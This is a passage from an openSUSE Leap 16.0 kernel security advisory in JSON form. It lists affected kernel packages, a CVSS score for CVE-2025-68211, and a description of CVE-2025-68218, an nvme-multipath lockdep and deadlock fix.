"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68211"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
